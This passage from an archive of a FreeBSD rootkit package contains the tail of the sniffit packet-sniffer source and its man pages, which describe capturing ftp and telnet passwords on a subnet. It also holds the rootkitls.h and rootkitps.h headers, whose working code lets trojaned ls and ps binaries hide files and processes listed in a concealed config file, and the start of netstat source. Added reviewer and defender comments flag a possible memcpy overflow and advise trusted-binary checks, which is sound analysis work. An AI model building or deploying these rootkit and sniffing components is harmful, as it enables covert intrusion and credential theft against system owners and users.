%02X",c); if(DUMPMODE & 2) n += printf(" %c",isprint(c)?c:'.'); } printf("\n\n"); break; default: printf("\nImpossible error! Sniffer Hartattack!\n"); exit(0); } return; } } #ifdef INCLUDE_INTERFACE /* Interactive packethandling */ int check_mask (const struct packetheader *p_header, const unsigned char *sp, char *conn_name, struct unwrap *info) /* return -1 : packet not for us */ /* else finish value */ { u_char *so,*dest; struct IP_header iphead; struct TCP_header tcphead; int proto; proto=unwrap_packet(sp, info); (*IP_nr_of_packets)++; if(proto==ICMP) {(*ICMP_nr_of_packets)++; return DONT_EXAMINE;} if(proto==UDP) {(*UDP_nr_of_packets)++; (*UDP_bytes_in_packets)+=(info->UDP_len+info->DATA_len+info->IP_len); return DONT_EXAMINE;} if(proto!=TCP) return DONT_EXAMINE; /* Packet info */ (*TCP_nr_of_packets)++; (*TCP_bytes_in_packets)+=(info->TCP_len+info->DATA_len+info->IP_len); /* Not a TCP packet */ memcpy(&iphead,(sp+PROTO_HEAD),sizeof(struct IP_header)); memcpy(&tcphead,(sp+PROTO_HEAD+info->IP_len),sizeof(struct TCP_header)); if(mask->source_ip!=0 && iphead.source!=mask->source_ip) return DONT_EXAMINE; if(mask->destination_ip!=0 && iphead.destination!=mask->destination_ip) return DONT_EXAMINE; if(mask->destination_port && ntohs(tcphead.destination) != mask->destination_port) return DONT_EXAMINE; if(mask->source_port && ntohs(tcphead.source) != mask->source_port) return DONT_EXAMINE; /* inet_ntoa gave wrong output sometimes */ so=(u_char *)&(iphead.source); dest=(u_char *)&(iphead.destination); sprintf(conn_name,"from %u.%u.%u.%u %u to %u.%u.%u.%u %u", so[0],so[1],so[2],so[3], ntohs(tcphead.source), dest[0],dest[1],dest[2],dest[3], ntohs(tcphead.destination)); if ((ntohs(tcphead.offset_flag) & FIN) != 0)/* check for reset conn. 
*/
    return TCP_FINISH;                      /* packet is a FIN */
  /* Segments without payload are dropped in interactive mode. */
  if (info->DATA_len == 0)
    return DONT_EXAMINE;                    /* packet not for us */
  return TCP_EXAMINE;                       /* interpret packet */
}

/*
 * interactive_packethandler - per-packet callback for interactive mode.
 *
 * dummy:    unused in the visible code
 * p_header: capture header, forwarded to check_mask()
 * sp:       start of the captured packet bytes
 *
 * Classifies the packet with check_mask(), maintains the list of running
 * connections, appends payload of the connection named in
 * log_conn->log_enter to connection_data, and finally signals the parent
 * process with SIGUSR1.
 *
 * NOTE(review): the function is declared as returning pcap_handler but
 * leaves through bare "return;" and by falling off the end.
 */
pcap_handler interactive_packethandler( char *dummy,
                                        const struct packetheader *p_header,
                                        const unsigned char *sp)
{
  char conn_name[CONN_NAMELEN];
  int finish;                               /* look out it's signed */
  struct unwrap info;

  finish=check_mask(p_header,sp,conn_name,&info);
  if(finish==DONT_EXAMINE)
    return;                                 /* Packet is not for us */

  if(finish!=TCP_FINISH)                    /* finish: already logged, or too short to add */
    add_itemlist(running_connections,conn_name);
  if(strcmp(log_conn->log_enter, conn_name)==0)
    {
    const u_char *data=sp+PROTO_HEAD+info.IP_len+info.TCP_len;
    /* Append only while the running total stays below the data area size.
       NOTE(review): info.DATA_len is derived from length fields inside the
       packet and is not compared with the captured length here. Its type
       is declared elsewhere; if it is signed and the header lengths exceed
       the IP total length, a negative value would pass this test and reach
       memcpy() as a very large size -- confirm and reject such packets
       before copying. */
    if(*DATAlength+info.DATA_len < LENGTH_OF_INTERPROC_DATA)
      {
      memcpy((connection_data+*DATAlength),data,info.DATA_len);
      *DATAlength+=info.DATA_len;
      }
    }
  if(finish==TCP_FINISH)
    del_itemlist(running_connections,conn_name);
  /* Tell the parent process that the shared data changed. */
  kill(getppid(),SIGUSR1);
}
#endif

/*
 * getaddrbyname - turn a host string into an address value.
 *
 * name: a string starting with a digit is handed to inet_addr(); anything
 *       else is looked up with gethostbyname().
 *
 * NOTE(review): only the first character is tested, so a host name that
 * begins with a digit is treated as a numeric address. isdigit() is called
 * on a plain char; the usual form casts to unsigned char first.
 */
static u_long getaddrbyname(char *name)
{
  struct hostent *he;

  if(isdigit(*name))
    return inet_addr(name);

  if(!(he = gethostbyname(name)))
    {
#ifdef DEBUG
    debug_msg("GetAddr: Couldn't get host.");
#endif
    /* perror(name); */
    }
  /* Lookup failure is not fatal here; the result expression that follows
     handles a NULL he. */
  return he ? 
*(long*)*he->h_addr_list : 0; } int main(int argc,char *argv[]) { char *dev, forced_dev[20], buffer[SNAPLEN]; int c; u_long ipaddr, memsize; int flag=0, doboth=0, FORCE_DEV=0; extern char *optarg; signal (SIGINT, my_exit); /* controled CTRL-C exit */ SNIFLEN=300; /* Set defaults */ DEST_PORT=0; /* Dest Port */ SNIFMODE=DUMPMODE=PROTOCOLS=ASC=WILDCARD=CFG_FILE=NO_CHKSUM=0; LOGLEVEL=0; Logfile[0]=0; IP=logging_device=NULL; #ifdef DEBUG if((debug_dev=fopen(DEBUG_DEVICE,"a"))<0) {printf("Couldn't open DEBUG device!\n");exit(0);} else { fprintf(debug_dev,"\n\nDEVICE OPENED FOR SNIFFIT DEBUGGING\n\n"); exit_func(close_debug_device); } #endif #ifdef INCLUDE_INTERFACE while((c=getopt(argc,argv,"D:A:P:idp:l:xabt:s:F:c:nvL:"))!=-1) { #else while((c=getopt(argc,argv,"A:P:dp:l:xabt:s:F:c:nvL:"))!=-1) { #endif /* Argument treating */ switch(c) { case 'v': printf("Sniffit Version %s - Copyright 1996 Brecht Claerhout\n",VERSION); #ifdef __DATE__ printf("Binary build %s %s\n",__DATE__,__TIME__); #endif exit(0); break; case 'd': DUMPMODE|=1; break; case 'a': DUMPMODE|=2; break; case 'x': DUMPMODE|=32; break; case 'p': DEST_PORT=atoi(optarg); break; case 'l': SNIFLEN=atol(optarg); break; case 'L': LOGLEVEL=atoi(optarg); break; case 'b': doboth=1; break; case 'A': ASC=1; non_printable=*optarg; break; case 'D': logging_device=optarg; break; case 'P': optarg=strlower(optarg); if(strstr(optarg,"tcp")) PROTOCOLS |= F_TCP; if(strstr(optarg,"icmp")) PROTOCOLS |= F_ICMP; if(strstr(optarg,"udp")) PROTOCOLS |= F_UDP; if(strstr(optarg,"ip")) PROTOCOLS |= F_IP; break; case 's': flag++; SNIFMODE=SOURCE; IP=optarg; break; case 't': flag++; SNIFMODE=DEST; IP=optarg; break; case 'i': flag++; SNIFMODE=INTERACTIVE; break; case 'n': NO_CHKSUM=1; break; case 'F': strcpy(forced_dev,optarg); FORCE_DEV=1; break; case 'c': flag++; read_cfg_file(optarg); #ifdef DEBUG_ONSCREEN printf("FINISHED INTERPRETING\n"); printf("sf:%d st:%d df:%d dt:%d\n",select_from_length,select_to_length, deselect_from_length, 
deselect_to_length); #endif CFG_FILE=1; break; default : break; } } if (getuid()!=0) printf("You should be root to run this program!\n"), exit(1); if(flag!=1) quit(argv[0]); if( (LOGLEVEL!=0) && (CFG_FILE==0) ) quit(argv[0]); if(LOGLEVEL != 0) open_logfile(); if(PROTOCOLS==0) PROTOCOLS |= F_TCP; if(doboth) SNIFMODE=BOTH; if((SNIFMODE!=INTERACTIVE)&&(CFG_FILE==0)) { /* if(index(IP,'x')) For SunOS */ if(strchr(IP,'x')) {printf("Wildcard detected, IP nr. not checked...\n"); WILDCARD=1; /* strcpy(index(IP,'x'),"\0"); */ strcpy(strchr(IP,'x'),"\0"); } else { ipaddr = getaddrbyname(IP); if(ipaddr==0) printf("Non existing host!\n"), exit(1); } } reset_all(); /* just to be sure */ if( (dev=pcap_lookupdev(NULL))==NULL ) { printf("No network devices found.... Sniffit giving up.\n"); exit(1); } if(FORCE_DEV!=0) { strcpy(dev,forced_dev); printf("Forcing device to %s (user requested)...\n",dev); printf("Make sure you have read the docs carefully.\n"); PROTO_HEAD=FORCED_HEAD_LENGTH; } if(strstr(dev,ETH_DEV)) /* For expansion */ {PROTO_HEAD=ETHERHEAD; printf("Supported ethernet device found. (%s)\n",dev); } if(strstr(dev,PPP_DEV)) {PROTO_HEAD=PPPHEAD; printf("Supported PPP device found. 
(%s)\n",dev); } if((dev_desc=pcap_open_live(dev,SNAPLEN,1,MSDELAY,NULL))==NULL) {printf("Couldn't open device.\n"); exit(0);} #ifdef INCLUDE_INTERFACE if (SNIFMODE==INTERACTIVE) { memsize=sizeof(int)+sizeof(int)+LENGTH_OF_INTERPROC_DATA+ sizeof(int)+sizeof(struct snif_mask)+ sizeof(struct shared_logged_conn)+ (CONNECTION_CAPACITY*sizeof(struct shared_conn_data))+ sizeof(int)+ sizeof(long)+sizeof(int)+sizeof(int)+sizeof(long)+ sizeof(int); memory_id = shmget(0,memsize,0700); if(memory_id<0) {perror("Interactive Sniffer Hartattack (No Shared mem avail!)"); exit(0);} exit_func(mem_exit); if((SHARED=shmat(memory_id,0,SHM_RND))==NULL) {perror("Interactive Sniffer Hartattack (Wow something is wrong here)"); exit(0);}; printf("Entering Shared memory at %p\n",SHARED); printf("Shared %d\n",memsize); timing = SHARED; /* set all pointers */ DATAlength = timing + sizeof(int); connection_data = DATAlength + sizeof(int); LISTlength = connection_data + LENGTH_OF_INTERPROC_DATA; mask = LISTlength + sizeof(int); logged_connections = mask + sizeof(struct snif_mask); log_conn=(struct shared_logged_conn *)logged_connections; running_connections = logged_connections + sizeof(struct shared_logged_conn); TCP_nr_of_packets= running_connections+(sizeof(struct shared_conn_data)*CONNECTION_CAPACITY); TCP_bytes_in_packets= TCP_nr_of_packets+sizeof(int); ICMP_nr_of_packets= TCP_bytes_in_packets+sizeof(long); UDP_nr_of_packets= ICMP_nr_of_packets+sizeof(int); UDP_bytes_in_packets= UDP_nr_of_packets+sizeof(int); IP_nr_of_packets= UDP_bytes_in_packets+sizeof(long); clear_shared_mem(0); if ((Pid=fork())<0) {perror("Interactive Sniffer Hartattack (Couldn't fork)"); exit(0);}; if(Pid==0) { sleep(4); while(1) if(pcap_dispatch(dev_desc,PACKETS, interactive_packethandler,NULL)<0) printf("Capturing Packets Failed\n"), exit(0); } else { exit_func(child_exit); signal(SIGCHLD,SIG_IGN); if(logging_device != NULL) { if(stat(logging_device,&log_dev_stat)<0) perror("\'-D\' option error"),exit(0); 
if((log_dev_stream=fopen(logging_device,"a")) == NULL) printf("Couldn't open device for logging output\n"),exit(0); } run_interface(); } } else { #endif if(CFG_FILE==0) printf("Sniffit.%s is up and running.... (%s)\n\n",VERSION,IP); else printf("Sniffit.%s is up and running.... (Config File Used)\n\n",VERSION); while(1) if(pcap_dispatch(dev_desc,PACKETS,packethandler,(u_char *)&ipaddr)<0) printf("Capturing Packets Failed\n"), exit(0); #ifdef INCLUDE_INTERFACE } #endif /* Close device? Nahhh.... fuck it! we don't get here anyway!*/ } fbsdrootkit-1.2/sniffit.0.3.3/sniffit.5100600 764 764 6105 6226213211 14762 0ustar dfdf.\" sniffit config file man page - Brecht Claerhout .\" .TH SNIFFIT 5 .SH NAME sniffit \- configuration file for sniffit (name arbirtary) .SH DESCRIPTION This page describes the format for the config file for .B sniffit (see .BR sniffit (8) ). This file allows you to specify in great detail witch packets should be processed by .B sniffit. This file also controls (or will control) some functions for the continuous logging ('-L' option). .LP A .B sniffit config file might look like: .IP .nf # Sniffit V.0.3.1 Sample Config file -- Brecht Claerhout logfile /var/adm/sniffit.today.log # First select all packets! select both mhosts 1 select both mhosts 2 # Now deselect all packets from/to those damn 'surfers' deselect both port 80 deselect both port 8001 .fi .LP This file will tell .B sniffit to process all packets on the subnet except those FROM/TO ports 80 and 8001 (thus we don't want logs of those mass WWW connections witch turn our logs unreadable). .SH "GLOBAL FORMAT" The file consists of lines, lines are formed by fields, fields are separated with SPACES (NO TABS). Unix comment lines (starting with '#' are allowed). 
So this gives us: .IP .SH "FIELD FORMAT" .IP "" .B select - .B Sniffit will look for packets that match the following description (other fields) .IP .B deselect - .B Sniffit will ignore packets that match the description .IP .B logfile - change the logfile name to instead of the default 'sniffit.log' .IP "" .B from - Packets FROM the host matching the following desc. are considered. .IP .B to - similar, Packets TO the.... .IP .B both - similar, Packets FROM or TO the.... .IP .B "a filename" - as an argument of 'logfile' in .IP "" .B host - The (de)selection criteria involve a hostname. .IP .B port - similar, ... a port number .IP .B mhosts - The (de)selection criteria involve multiple hosts, like with the wildcards in 0.3.0, but without the 'x' .IP "" Either a hostname, a port number or a number-dot partial notation indicating multiple hosts depending on .IP "" A port number, if was 'host' or 'mhosts' (optional, if not filled in, all ports are going to be (de)selected) .SH "FILE INTERPRETING" The config file is interpreted SEQUENTIALLY, so watch it, don't mix lines in a file. Example: .IP .nf select both mhosts 100.100.12. deselect both port 80 select both host 100.100.12.2 This file will get you the packets: a) Sent by hosts '100.100.12.*' b) EXCEPT the WWW packets c) BUT showing the WWW packets concerning 100.100.12.2 .fi .IP .nf select both mhosts 100.100.12. 
select both host 100.100.12.2 deselect both port 80 Will give you the packets (probably unwanted result): a) Send by hosts '100.100.12.*' b) Send from/to 100.100.12.2 (useless line) c) deselecting all WWW packets on the subnet .ni .SH AUTHOR Brecht Claerhout .SH "SEE ALSO" .BR sniffit (8) fbsdrootkit-1.2/sniffit.0.3.3/sniffit.8100600 764 764 20574 6226213211 15013 0ustar dfdf.\" Sniffit man page file - Brecht Claerhout .\" Process this file with .\" groff -man -Tascii foo.1 .\" .TH SNIFFIT 8 .SH NAME sniffit \- packet sniffer and monitoring tool .SH SYNOPSIS .B sniffit [-xdabvn] [-P .I proto .B ] [-A .I char .B ] [-p .I port .B ] [-l .I sniflen .B ] [-L .I loglevel .B ] [-F .I snifdevice .B ] [-D .I tty .B ] [(-t .I Target-IP .B | -s .I Source-IP .B ) | -i | -c .I config-file .B ] .SH DESCRIPTION .B sniffit is a packet sniffer for TCP/UDP/ICMP packets. .B sniffit is able to give you very detailed technical info on these packets (SEQ, ACK, TTL, Window, ...) but also packet contence in different formats (hex or plain text, ...). .LP .B sniffit can by default handle ethernet and PPP devices, but can easily be forced into using other devices (read the .B README.* and .B config.h files on this subject!) .LP The sniffer can easily be configured in order to 'filter' the incomming packets (to make the sniffing results easier to study). The config file (see .BR sniffit (5) ) allows you to be verry specific on the packets to be processed. .LP .B sniffit also has an interactive mode for active monitoring, and can also be used for continuous monitoring on different levels. .SH NOTE This man page is supposed to be a reference manual. So please read .B README.* first, and use this only for better understanding or for a quick check on the use of .B sniffit .SH OPTIONS .IP -v Shows the version of .B sniffit you are running and exits .I "(overrides all)" .IP "-t Target-IP" Only process packets TO Target-IP. If Target-IP is in dot-nr notation, 'x' is allowed as wildcard. (e.g. 
'-t 157.193.x', '-t x', ...) .I "(NOT compatible with: '-s' '-i' '-c' '-v' '-L')" .IP "-s Source-IP" Similar to '-t', only process packets FROM Source-IP. .I "(NOT compatible with: '-t' '-i' '-c' '-v' '-L')" .IP -b 'both' mode, together with '-s' or '-t', only process FROM/TO the IP specified by '-s' or '-t' .I "(NOT compatible with: '-t' '-i' '-c' '-v' '-L')" .IP "-c config-file" Use .I config-file for the packet filtering. This allows you to be very specific on the packets to be processed (see .BR sniffit (5) for details on the format). .I "(NOT compatible with: '-t' '-s' '-i' '-v' '-L')" .IP -i Launch the ncurses interface for active monitoring ('interactive mode'). (NOT available if you compiled without INTERACTIVE support see .B config.h and .B README.* ) (one of the options '-t' '-s' '-i' '-c' is required) .I "(NOT compatible with: '-t' '-s' '-c' '-v' '-L')" .IP -n Turn of IP checksum checking. This can show you bogus packets. (mind you ARP, RARP, other non-IP packets will show up bogus too) .I "(compatible with ALL options)" .IP -x Prints extended info on TCP packets to stdout (SEQ, ACK, Flags, etc...) Interesting when tracing spoofs, packet loss and other real net debugging/checking tasks. (if you want to log this, pipe stdout to a file) .I "(NOT compatible with: '-i' '-v')" .IP -d 'dump mode', shows the packets on the screen (stdout) instead of logging into files (default). Data is printed in bytes (hex). .I "(NOT compatible with: '-i' '-v' '-L')" .IP -a 'dump mode', same of '-d' but outputs ASCII. Non printable chars are replaced by '.'. ('-d' and '-a' mix without any problem) .I "(NOT compatible with: '-i' '-v' '-L')" .IP "-P proto" Specify the protocols that should be processed (default TCP). Possible options currently are: IP, TCP, ICMP, UDP. They can be combined. IP, ICMP, UDP info is dumped to stdout. IP gives ADDITIONAL info on the IPwrapping around other packets, it is not needed to specify IP for TCP packet logging. 
IP, UDP, ICMP packets are not filtered. .I "(NOT compatible with: '-i' '-v' '-L')" .IP "-A char" When in 'normal mode' (not '-d','-a','-i','-L'), all non-printable chars will be replaced by .I char .I "(NOT compatible with: '-a' '-d' '-i' '-v' '-L')" .IP "-p port" Only checks packets going TO (!!) port .I port , 0 means all ports, default is 0 (all). .I "(NOT compatible with: '-c' '-i' '-v' '-L')" .IP "-l sniflen" Amount of data to log (default 300 bytes) in 'normal mode'. The first .B sniflen bytes of every connection are logged. Length 0 means log everything. (look out with diskspace!) .I "(NOT compatible with: '-i' '-v' '-L')" .IP "-F snifdevice" Force sniffit to use a certain network device. .I snifdevice can be found with .I ifconfig (see .BR ifconfig (8) ). .B sniffit supports ethernet and PPP by default. Read .B README.* for info on forcing the use of other devices. .I "(compatible with ALL options)" .IP "-D tty" All logging output will be sent to that device. .I "(ONLY works with '-i')" .IP "-L loglevel" Use .B sniffit as a monitoring tool and enable loglevel .I loglevel The file for logging can be specified in the config file (see .BR sniffit (5) ) but is .B sniffit.log by default. .I "(ONLY works with '-c')" .SH "NORMAL MODE" A bunch of .I sniflen initial bytes (default 300) of each connection is logged into a file .B x.x.x.x.p-y.y.y.y.o where 'x.x.x.x' is the sending host (port 'p') and 'y.y.y.y' the receiving host (port 'o'). .SH "DUMP MODE ('-d' and/or '-a')" Output is dumped to stdout, the packet contents are shown in their unwrapped form (the complete IP packet). .SH "INTERACTIVE MODE ('-i')" Keys available in interactive mode: .IP "UP or 'k'" self explanatory .IP "DOWN or 'j'" self explanatory .IP "F1 or '1'" Enter a host (enter 'all' for no mask) for packet filtering (host that sends the packets) .IP "F2 or '2'" Enter a host (enter 'all' for no mask) for packet filtering.
(host that receives the packets) .IP "F3 or '3'" Enter a port (enter '0' for no mask) for packet filtering. (host that sends the packets) .IP "F4 or '4'" Enter a port (enter '0' for no mask) for packet filtering. (host that receives the packets) .IP "F5 or '5'" Start a program 'sniffit_key5' with arguments .I " " If the program doesn't exist, nothing is done. Sniffit should be in the same path as sniffit was STARTED FROM (not necessarily the path sniffit is stored in) This function is useful for interactive connection killing or extra monitoring. A little shell script can always transform the arguments given and pass them on to other programs. .IP "F6 or '6'" Same as F5 or '5', but with program 'sniffit_key6' .IP "F7 or '7'" Same as F5 or '5', but with program 'sniffit_key7' .IP "F8 or '8'" Same as F5 or '5', but with program 'sniffit_key8' .IP "ENTER" a window will pop up and log the connection, or the connection output will be sent to a chosen device if you used the '-D' option. .IP "'q'" When in logging mode, stop logging. Otherwise, quit. .IP "'n'" Toggle netstatistics. These are sampled at 3 secs, look in the config.h file to change this. .SH "LOGGING MODE ('-L')" Output is saved to .B sniffit.log ,unless you have specified some other name in the config file (see .BR sniffit (5) ). .LP .IP "Loglevel 1 (Raw level)" Log all SYN, FIN, RST packets. This will give you an overview of all network (TCP) traffic in a 'RAW' way (a connection starting could give you at least 2 SYN packets, etc...). .IP "Loglevel 10 (Normal level)" Same as Raw level 1, but a bit more intelligent. Unless packets are transmitted multiple times because of packet loss, you will only get 1 notice of a connection starting or ending. (the packet id will give you the host that initiated the connection first) .IP "Loglevel 12 (Normal level)" This option will spy on traffic concerning ports 21 and 23 on the subnet. Yes indeed, .B ftp (see .BR ftp (1) ) and .B telnet (see .BR telnet (1) ).
Sniffit will try to catch login and passwords for these applications. .IP .B ftp - Easy catching. Even multiple tries are registered. .IP .B telnet - A bit harder. We only try to catch the first attempt, so if someone fails the first login, you will miss his password. A '~' in the login and passwords fields can be a nonprintable character (if in the beginning of a field, probably due to an early start of registration) or a '~'. Interested in some tricks that made this work? Have a look at in function 'packethandler' in the sniffit.*.c file) .SH "IP ICMP UDP LOGGING" Information on these packets is dumped to stdout. Packet origin/destination can't be filtered (otherwise put: filtering options only refer to TCP packets). The contence of UDP packets is only shown when enabling '-a' or '-d'. .SH AUTHOR Brecht Claerhout .SH "SEE ALSO" .BR sniffit (5) fbsdrootkit-1.2/rootkitls.h100600 764 0 2151 6273471757 13670 0ustar dfroot
/*
 * rootkitls.h: name filter meant to be compiled into a directory-listing
 * program (the SHOWFLAG comment below refers to 'ls').
 *
 * file_block_list() loads a list of strings from a file; check_file()
 * reports whether a path contains any of them.  How the caller uses the
 * result is not visible in this header -- presumably matching entries are
 * left out of the listing.
 *
 * Defender note: output from a binary built with this header is not
 * evidence that a file is absent.  Examine the suspect host with known-good
 * static binaries from read-only media or from an offline image, and compare
 * system binaries against a trusted hash baseline.
 */
#define STR_SIZE 128
#define SHOWFLAG /* Able to list files with 'ls -/' command */

/* One list node; the last node in the list is an unfilled terminator. */
struct h_st {
	struct h_st *next;
	char filename[STR_SIZE];	/* substring to match against paths */
};

struct h_st *hack_list;		/* head of the list built by file_block_list() */
struct h_st *h_tmp;		/* shared cursor used by both functions below */
char tmp_str[STR_SIZE];		/* line buffer for fgets() */
FILE *fp_hack;			/* handle on the list file; not closed in this header */
int showall=0;			/* not read in this header; presumably set by the SHOWFLAG option */

/*
 * Build hack_list from the file named by the first nine characters of
 * ROOTKIT_HIDE_FILES (defined elsewhere -- not visible here).
 *
 * Each line read becomes one node, with its final character overwritten by
 * '\0' (normally the trailing newline).  If the file cannot be opened the
 * list consists of the terminator node only, so check_file() matches nothing.
 */
inline file_block_list()
{
	char LSCONF[10];

	/*
	 * The path is copied one character at a time rather than used as a
	 * literal.  NOTE(review): presumably this keeps the path from appearing
	 * as one contiguous string in the compiled binary, so a plain strings(1)
	 * sweep of a suspect binary may not show it -- confirm against a build.
	 */
	LSCONF[0]=ROOTKIT_HIDE_FILES[0];
	LSCONF[1]=ROOTKIT_HIDE_FILES[1];
	LSCONF[2]=ROOTKIT_HIDE_FILES[2];
	LSCONF[3]=ROOTKIT_HIDE_FILES[3];
	LSCONF[4]=ROOTKIT_HIDE_FILES[4];
	LSCONF[5]=ROOTKIT_HIDE_FILES[5];
	LSCONF[6]=ROOTKIT_HIDE_FILES[6];
	LSCONF[7]=ROOTKIT_HIDE_FILES[7];
	LSCONF[8]=ROOTKIT_HIDE_FILES[8];
	LSCONF[9]='\0';

	h_tmp=(struct h_st *)malloc(sizeof(struct h_st));
	hack_list=h_tmp;
	if(fp_hack=fopen(LSCONF, "r")) {
		while(fgets(tmp_str, 126, fp_hack)) {
			/* allocate the next (terminator) node before filling this one */
			h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));
			strcpy(h_tmp->filename, tmp_str);
			h_tmp->filename[strlen(h_tmp->filename)-1]='\0';
			h_tmp=h_tmp->next;
		}
	}
	h_tmp->next=NULL;
}

/*
 * Return 1 if any string loaded by file_block_list() occurs anywhere in
 * fpath (strstr substring match), otherwise 0.  The terminator node is not
 * tested because the loop stops when ->next is NULL.
 */
inline int check_file(char *fpath)
{
	for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next)
		if(strstr(fpath, h_tmp->filename))
			return(1);
	return(0);
}
fbsdrootkit-1.2/rootkitps.h100664 764 0 3677 6257600736 13715 0ustar dfroot
/*
 * rootkitps.h: process filter meant to be compiled into a process-listing
 * program (the SHOWFLAG comment below refers to 'ps').
 *
 * process_block_list() loads (type, value) rules from a file;
 * check_process() reports whether a process matches any rule.  How the
 * caller uses the result is not visible in this header -- presumably
 * matching processes are left out of the listing.
 *
 * Defender note: a process table printed by a binary built with this header
 * cannot be trusted.  Cross-check with a known-good binary or with an
 * independent view of kernel state, and verify system binaries against a
 * trusted hash baseline.
 */
#define STR_SIZE 128
#define SEP_CHAR " \n"
#define SHOWFLAG /* Able to list processes with 'ps -/' command */

/* Rule types stored in h_st.hack_type */
#define BY_USER 0	/* value is a numeric uid */
#define BY_TTY 1	/* value is a tty name with any "tty"/"cua" prefix removed */
#define BY_NAME 2	/* value is a substring of the command name */

/* One rule; the last node in the list is an unfilled terminator. */
struct h_st {
	struct h_st *next;
	int hack_type;
	char hack_cmd[STR_SIZE];
};

struct h_st *hack_list;		/* head of the rule list */
struct h_st *h_tmp;		/* shared cursor used by both functions below */
char tmp_str[STR_SIZE];		/* line buffer for fgets() */
char *strp;			/* current strtok() token */
FILE *fp_hack;			/* handle on the rule file; not closed in this header */
int show_all=0;			/* not read in this header; presumably set by the SHOWFLAG option */

/*
 * Build hack_list from the file named by the first nine characters of
 * ROOTKIT_HIDE_PROCESSES (defined elsewhere -- not visible here).
 *
 * Each line is split on SEP_CHAR: the first token is converted with atoi()
 * into the rule type, the second is copied as the rule value.  If the file
 * cannot be opened the list holds only the terminator node and
 * check_process() matches nothing.
 */
inline process_block_list()
{
	char PSCONF[10];

	/* path assembled one character at a time, as in the file-list loader */
	PSCONF[0]=ROOTKIT_HIDE_PROCESSES[0];
	PSCONF[1]=ROOTKIT_HIDE_PROCESSES[1];
	PSCONF[2]=ROOTKIT_HIDE_PROCESSES[2];
	PSCONF[3]=ROOTKIT_HIDE_PROCESSES[3];
	PSCONF[4]=ROOTKIT_HIDE_PROCESSES[4];
	PSCONF[5]=ROOTKIT_HIDE_PROCESSES[5];
	PSCONF[6]=ROOTKIT_HIDE_PROCESSES[6];
	PSCONF[7]=ROOTKIT_HIDE_PROCESSES[7];
	PSCONF[8]=ROOTKIT_HIDE_PROCESSES[8];
	PSCONF[9]='\0';

	h_tmp=(struct h_st *)malloc(sizeof(struct h_st));
	hack_list=h_tmp;
	if(fp_hack=fopen(PSCONF,"r")) {
		while(fgets(tmp_str, 126, fp_hack)) {
			h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));
			strp=(char *)strtok(tmp_str, SEP_CHAR);
			h_tmp->hack_type=atoi(strp);
			/* '\0' is used here as the null pointer that continues the scan */
			strp=(char *)strtok('\0', SEP_CHAR);
			strcpy(h_tmp->hack_cmd, strp);
			h_tmp=h_tmp->next;
		}
	}
	h_tmp->next=NULL;
}

/*
 * Return 1 if the process described by kip matches any loaded rule,
 * otherwise 0.  Every rule is evaluated; a match only sets the flag.
 *
 *   BY_USER  process uid equals atoi(value); the field read depends on NEWVM
 *   BY_TTY   controlling terminal name, minus a leading "tty" or "cua",
 *            equals value exactly
 *   BY_NAME  value occurs anywhere in the command name (p_comm)
 */
inline int check_process(struct kinfo_proc *kip)
{
	int block=0;
	dev_t dev;
	char *ttname;

	for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) {
		switch(h_tmp->hack_type) {
		case BY_USER:
#ifndef NEWVM
			if(kip->kp_proc.p_uid==atoi(h_tmp->hack_cmd))
#else
			if(kip->kp_eproc.e_ucred.cr_uid==atoi(h_tmp->hack_cmd))
#endif
				block=1;
			break;
		case BY_TTY:
			dev=kip->kp_eproc.e_tdev;
			/* no controlling terminal, or no name for it: rule cannot match */
			if(dev==NODEV||!(ttname=devname(dev,S_IFCHR)))
				break;
			else {
				if(!strncmp(ttname,"tty",3)||!strncmp(ttname,"cua",3))
					ttname+=3;
				if(!strcmp(ttname,h_tmp->hack_cmd))
					block=1;
			}
			break;
		case BY_NAME:
			if(strstr(kip->kp_proc.p_comm,h_tmp->hack_cmd))
				block=1;
			break;
		}
	}
	return(block);
}
fbsdrootkit-1.2/netstat/ 40700 764 0 0 6257642722 13043 5ustar dfrootfbsdrootkit-1.2/netstat/Makefile100600 764 0 403 6257642727 14564 0ustar dfroot# 
@(#)Makefile 8.1 (Berkeley) 6/12/93 PROG= netstat SRCS= if.c inet.c iso.c main.c mbuf.c mroute.c ns.c route.c \ tp_astring.c unix.c CFLAGS+=-I/sys .PATH: ${.CURDIR}/../netiso BINGRP= kmem BINMODE=2555 LDADD= -lkvm DPADD= ${LIBKVM} .include fbsdrootkit-1.2/netstat/if.c100600 764 0 25044 6163407272 13724 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)if.c 8.3 (Berkeley) 4/28/95"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "netstat.h" #define YES 1 #define NO 0 static void sidewaysintpr __P((u_int, u_long)); static void catchalarm __P((int)); /* * Print a description of the network interfaces. */ void intpr(interval, ifnetaddr) int interval; u_long ifnetaddr; { struct ifnet 